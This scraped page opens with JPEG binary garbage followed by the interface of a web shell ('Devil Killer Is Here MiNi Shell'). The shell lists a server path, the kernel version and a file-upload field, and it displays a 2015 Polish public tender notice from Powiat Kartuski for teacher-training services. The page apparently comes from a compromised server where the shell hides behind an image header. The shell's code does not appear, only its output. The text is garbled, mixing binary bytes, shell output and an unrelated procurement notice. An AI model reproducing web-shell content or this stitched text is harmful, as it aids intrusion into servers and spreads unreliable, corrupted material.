JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/9296-N-2015.html

<p class="kh_header"><b>Kartuzy: Świadczenie usług polegających na przeprowadzeniu Rocznego Programu Wspomagania dla Zespołu Szkół w Pomieczynie oraz świadczenie usług eksperckich dla 2 sieci nauczycielskich dla szkół i przedszkoli z terenu powiatu kartuskiego w ramach projektu pn. System wspierania rozwoju szkół w powiecie kartuskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 9296 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Kartuski , ul. Dworcowa 1, 83-300 Kartuzy, woj. pomorskie, tel. 58 6810328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://spow.kartuzy.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług polegających na przeprowadzeniu Rocznego Programu Wspomagania dla Zespołu Szkół w Pomieczynie oraz świadczenie usług eksperckich dla 2 sieci nauczycielskich dla szkół i przedszkoli z terenu powiatu kartuskiego w ramach projektu pn. System wspierania rozwoju szkół w powiecie kartuskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług polegających na przeprowadzeniu Rocznego Programu Wspomagania dla Zespołu Szkół w Pomieczynie oraz świadczenie usług eksperckich dla 2 sieci nauczycielskich dla szkół i przedszkoli z terenu powiatu kartuskiego w ramach projektu pn. System wspierania rozwoju szkół w powiecie kartuskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. 
2. Zamawiający dopuszcza składanie ofert częściowych. Zamówienie składa się z trzech niezależnych części. 
3. Wykonawca jest zobowiązany do przeprowadzenia zajęć osobiście, lub przez osoby wskazane w ofercie, które spełniają warunki udziału w postępowaniu i posiadają odpowiednie doświadczenie w zakresie przedmiotu zajęć opisane w wymaganiach dotyczących Wykonawcy.
Nie ma możliwości przeprowadzania zajęć zdalnie (np. komunikatory internetowe, telekonferencja, telefonicznie).
4. W ramach zamówienia Wykonawca zobowiązany jest do stałego i bieżącego kontaktu z Zamawiającym lub jego przedstawicielem w zakresie dotyczącym przedmiotu zamówienia (tematyki zajęć, terminów realizacji zajęć) w sposób umożliwiający sprawne wykonanie przedmiotu zamówienia.
5. Każdorazowo Wykonawca jest zobowiązany do przeprowadzenia rozpoznania w grupie uczestników podczas zajęć i być w stanie zweryfikować na bieżąco ich tematykę, tak by osiągnąć zamierzony cel i rezultaty.
6. W ramach zamówienia Wykonawca sporządzi i przekaże każdemu uczestnikowi zajęć komplet (np. kserokopie) materiałów szkoleniowych (w ilości odpowiadającej liczebności grupy) spójnych tematycznie z tematyką zajęć, każdorazowo przed rozpoczęciem poszczególnych zajęć. Wzór proponowanych materiałów przekazane zostaną do weryfikacji przez Zamawiającego wraz z programem zajęć.
Akceptacja i pozytywna weryfikacja programu zajęć oraz wzoru materiałów jest warunkiem umożliwiającym Wykonawcy przeprowadzenie zajęć!
7. Częstotliwość i długość prowadzenia zajęć uzależniona jest od preferencji nauczycieli uczestników projektu. Jednym z założeń projektu jest dostosowanie długości i częstotliwości zajęć do wymagań uczestników projektu, tak by nie kolidowały z życiem zawodowym i prywatnym uczestników, co wprost przekłada się na liczebność grupy docelowej. Ze względu na specyfikę grupy docelowej Wykonawca pozostanie w pełni dyspozycyjny w zakresie wyznaczania terminów zajęć. Zamawiający w porozumieniu z nauczycielami (uczestnikami projektu) wyznaczy terminy przeprowadzenia zajęć z minimum 2 tygodniowym wyprzedzeniem. Zamawiający zapewni odpowiednią ilość uczestników zajęć w terminie wcześniej wyznaczonym, a Wykonawca zobowiązany będzie do przeprowadzenia zajęć w wyznaczonym terminie. W uzasadnionych przypadkach (np. choroba Wykonawcy) Wykonawca może zamienić termin przeprowadzenia zajęć w porozumieniu z Zamawiającym lub jego przedstawicielem. Wówczas Wykonawca jest odpowiedzialny za organizację zajęć w dogodnym dla uczestników terminie.
8. Po zakończeniu realizacji RPW w ciągu 14 dni Wykonawca przedstawi Zamawiającemu raport z realizacji RPW zawierający następujące informacje:
a) ilość godzin,
b) szczegółowa tematyka zajęć i zastosowane strategie,
c) osiągnięte cele w wyniku przeprowadzonego szkolenia,
d) rodzaj przekazanych nauczycielom i  materiałów (tematy),
e) rodzaj wypracowanych produktów (dotyczy wdrożeń).
Raport stanowić będzie część dokumentacji związanej z ewaluacją jakościową projektu i zostanie włączony do dokumentacji projektowej.
9. Szczegółowy opis przedmiotu zamówienia zawarty został w załączniku nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od pobrania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się dysponowaniem dla każdej z części co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia odpowiedzialną za świadczenie usług, posiadającą:
Dla CZĘŚCI I: 
a) wykształcenie wyższe magisterskie z zakresu psychologii lub/i pedagogiki,
b) doświadczenie w pracy z nauczycielami oraz doświadczenie w pracy z dziećmi lub młodzieżą w zakresie tematyki zamówienia,
c) ukończony co najmniej jeden kurs w zakresie metod relaksacyjnych,
d) ukończony co najmniej jeden kurs z zakresu diagnozowania gotowości szkolnej.
Dla CZĘŚCI II: 
a) wykształcenie wyższe pedagog/psycholog,
b) doświadczenie w prowadzeniu zajęć z nauczycielami w zakresie: pedagogika zabawy oraz matematyka w działaniu,
c) doświadczenie w realizacji zajęć metodami wypracowanymi przez KLANZĘ,
d) certyfikat trenera KLANZY.
Dla CZĘŚCI III: 
a) wykształcenie wyższe pedagog/psycholog,
b) doświadczenie w prowadzeniu zajęć z nauczycielami w zakresie: pedagogika zabawy oraz matematyka w działaniu,
c) doświadczenie w realizacji zajęć metodami wypracowanymi przez KLANZĘ,
d) certyfikat trenera KLANZY</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) odpowiednio wypełniony i podpisany formularz ofertowy (załącznik nr 2 do SIWZ);
2) oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907, 984, 1047 i 1473, z 2014 r. poz. 423, 811, 915, 768, 1146 i 1232) (załącznik nr 3 do SIWZ);
3) Upoważnienie do podpisania oferty (pełnomocnictwo) powinno być dołączone do oferty, o ile nie wynika ono z dokumentów dołączonych do oferty. Upoważnienie to powinno być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza.
4) W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależne od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
5) Dotyczy sekcji III. 4.3.1) Dokumenty podmiotów zagranicznych - Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, wymienionych w pkt III.4.3.1) niniejszego ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80.00</li>
<li>2 - Doświadczenie w zakresie przedmiotu zamówienia - 20.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający przewiduje możliwość zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, 
w przypadku zmiany osób wskazanych w załączniku do oferty Wykaz osób, które uczestniczyć będą w wykonywaniu zamówienia z zastrzeżeniem, że będą to osoby posiadające kwalifikacje i doświadczenie nie mniejsze niż określone w warunkach udziału w postępowaniu, jedynie w formie pisemnej w przypadkach wystąpienia sytuacji losowych udokumentowanych przez Wykonawcę, tylko i wyłącznie za pisemną zgodą Zamawiającego.
2) Zmiana osoby wskazanej w ofercie może nastąpić na pisemny wniosek Wykonawcy, za zgodą Zamawiającego w formie pisemnej pod rygorem nieważności takiej zmiany. W przypadku zmiany osoby, Wykonawca powinien przedstawić Zamawiającemu nową osobę o nie gorszych kwalifikacjach i uprawnieniach w stosunku do osoby, która została wskazana w ofercie.
3) Zamawiający może także zażądać od Wykonawcy zmiany osoby, o której mowa 
w ust. 1, jeżeli uzna, że nie wykonuje ona należycie swoich obowiązków, na każdym etapie realizacji zadania jeżeli badanie ewaluacyjne przeprowadzone w grupie uczestników zajęć wykaże brak kompetencji osoby i/lub gdy sposób przekazywania wiedzy i prowadzenia zajęć będzie niezrozumiały bądź nieefektywny. Wówczas Zamawiający wyznaczy nowy termin realizacji danego elementu, po uprzednim przedstawieniu dla Zamawiającego propozycji zmiany wykładowcy.
4) W przypadku zmiany stawki podatku VAT w trakcie trwania umowy Zamawiający dokona w drodze aneksu uaktualnienia stawki podatku VAT zgodnie z obowiązującą Ustawą od towarów i usług. Uaktualniona stawka podatku VAT będzie obowiązywała w dalszej realizacji przedmiotu zamówienia wynikającej z umowy.
5) W przypadku, gdy wystąpi okoliczność, gdy zbędnym lub niemożliwym stanie się zrealizowanie przedmiotu zamówienia w wymiarze określonym w § 4 ust. 3 Zamawiający zastrzega sobie prawo pomniejszenia wynagrodzenia za wykonaną usługę.
6) W przypadku gdy z winy Zamawiającego niemożliwe będzie wykonanie przedmiotu umowy w terminie określonym w § 3 (np. ze względu na niemożliwość zebrania grupy w ustalonym wcześniej terminie, odwołanie zajęć przez Zamawiającego) dopuszcza się przedłużenie okresu wykonywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://spow.kartuzy.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w budynku Starostwa Powiatowego w Kartuzach przy ul. Gdańskiej 26, w pok. nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2015 godzina 10:00, miejsce: w budynku Starostwa Powiatowego w Kartuzach przy ul. Gdańskiej 26, w pok. nr 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach projektu pn. System wspierania rozwoju szkół w powiecie kartuskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roczny Program Wspomagania dla Zespołu Szkół w Pomieczynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Numer części: 1
Tytuł:	Przeprowadzenie Rocznego Programu Wspomagania w tematyce Jak pomóc uczniowi osiągnąć sukces edukacyjny? dla Zespołu Szkół w Pomieczynie
Przedmiot zamówienia:	Przedmiotem zamówienia jest świadczenie usług polegających na przeprowadzeniu II Edycji Rocznego Programu Wspomagania w Zespole Szkół w Pomieczynie w ramach projektu pn. System wspierania rozwoju szkół w powiecie kartuskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet III Wysoka jakość systemu oświaty, Działanie: 3.5  Kompleksowe wspomaganie rozwoju szkół.
Miejsce: ZS w Pomieczynie, 83-305 Pomieczyno, ul. Kartuska 14
Diagnoza placówki uzasadniająca wybór tematu:
Po rocznej współpracy ze szkołą i przeprowadzonej diagnozie można powiedzieć, że mocne strony szkoły to wykwalifikowana kadra pedagogiczna, dobre relacje w zespole nauczycielskim, mała, bezpieczna szkoła, dobra frekwencja uczniów. Nauczyciele pragną rozwijać swe kompetencje w zakresie diagnozy potrzeb i możliwości edukacyjnych uczniów oraz stosowania takich metod nauczania, które pozwolą na osiągnięcie sukcesu edukacyjnego oraz wpłyną pozytywnie na wyniki egzaminów zewnętrznych.
Obszar tematyczny: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Cel główny RPW:
Rozwój kompetencji nauczycieli i specjalistów w obszarze diagnozowania potrzeb oraz możliwości uczniów oraz dobór skutecznych metod i form pracy.
Cele szczegółowe:
1. rozwój kompetencji w zakresie dopasowywania metod pracy do indywidualnych potrzeb uczniów
2. wyposażenie nauczycieli w kompetencje potrzebne do przeprowadzenia wczesnej diagnozy rozwoju i gotowości szkolnej dzieci oraz dostosowania metod pracy do indywidualnych potrzeb rozwojowych
3. rozwój wiedzy dotyczącej procesów uczenia się i osiągania sukcesów edukacyjnych przez uczniów
4. realizacja zadań dotyczących indywidualizacji procesu edukacji i właściwej organizacji środowiska edukacyjnego
Wymagane rezultaty wprowadzenia RPW:
1. nauczyciele w sposób zaplanowany diagnozują mocne i słabe strony ucznia, określają poziom jego wiedzy i umiejętności
2. nauczyciele dopasowują metody pracy do indywidualnych potrzeb uczniów
3. nauczyciele współpracują z rodzicami na rzecz wspierania rozwoju ucznia
4. szkoła realizuje zadania dotyczące indywidualizacji procesu edukacji i właściwej organizacji środowiska edukacyjnego
Formy prowadzenia RPW:
27 godzin zegarowych zajęć 
w formie: 1. Warsztaty: 19 godzin
2. Konsultacje grupowe, indywidualne: 8 godzin
3. Opracowania: 0 godzin
10 godzin zegarowych wdrożenia w formie: w formie lekcji pokazowych, konsultacji grupowych, indywidualnych godz.: 10
Wielkość grupy docelowej	18 osób
Opis szczegółowy i tematyka poszczególnych form RPW:
1. Diagnoza gotowości szkolnej, możliwości i potrzeb uczniów początkiem ich kariery szkolnej;
Czas trwania: 5h
Cel:  Podniesienie kompetencji nauczycieli i specjalistów w obszarze diagnozowania potrzeb oraz możliwości uczniów
Forma: warsztat
Rezultaty:
Po ukończeniu szkolenia, nauczyciele:
- wyposażeni są w wiedzę dotyczącą diagnozowania gotowości szkolnej
- potrafią określić poziom wiedzy i umiejętności
- wyposażeni są w konkretne narzędzia diagnozy
- pracują z uczniem, bazując na jego mocnych stronach
2. Aktywizujące metody nauczania
Czas trwania: 8h
Cel: poszerzenie kompetencji nauczycieli w zakresie  dobierania odpowiednich,  najbardziej efektywnych metod i form pracy.
Forma: warsztat
Rezultaty
Po ukończeniu szkolenia, nauczyciele:
- nabyli wiedzę w zakresie stosowania aktywizujących metod nauczania
- poznane metody stosują w praktyce
- indywidualizują metody nauczania
3. Jak pomóc uczniowi radzić sobie ze stresem?
Czas trwania: 6h
Cel: rozwój w zakresie prowadzenia zajęć relaksacyjnych niwelujących stres i napięcie towarzyszące procesowi edukacyjnemu
Forma: warsztat
Rezultaty
Po ukończeniu szkolenia, nauczyciele:
- poszerzyli wiedzę w zakresie radzenia sobie ze stresem
- poszerzyli wiedzę z zakresu zajęć relaksacyjnych z uczniami
- dysponują przykładowymi scenariuszami godzin wychowawczych poświęconych radzeniu sobie ze stresem
Opis formuły wdrożeń RPW:
1. Diagnoza gotowości szkolnej, możliwości i potrzeb uczniów początkiem ich kariery szkolnej (3h)
Forma: konsultacje grupowe, bądź indywidualne w zależności od potrzeb nauczycieli, (sugerowane omówienie narzędzi diagnostycznych)
2. Aktywizujące metody nauczania (3h)
Forma: lekcje pokazowe dla nauczycieli z wykorzystaniem metod aktywizujących, konsultacje grupowe- w odniesieniu do przeprowadzonej lekcji, konsultacje indywidualne
3. Jak pomóc uczniowi radzić sobie ze stresem? (4h)
Forma: warsztaty dla uczniów dotyczące radzenia sobie ze stresem (pokazowe godziny wychowawcze) konsultacje grupowe- w odniesieniu do przeprowadzonych warsztatów, konsultacje indywidualne
Rezultaty wdrożeń:
- Rozwój wiedzy w obszarze diagnozowania potrzeb oraz możliwości uczniów
- Opracowanie i  omówienie katalogu narzędzi do diagnozy gotowości szkolnej
- nauczyciele potrafią prowadzić zajęcia warsztatowe z uczniami zmierzające do ograniczenia stresu i umiejętności radzenia sobie z nim
- nauczyciele znają i stosują aktywizujące metody nauczania w praktyce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. Doświadczenie w zakresie przedmiotu zamówienia - 20.00</li>
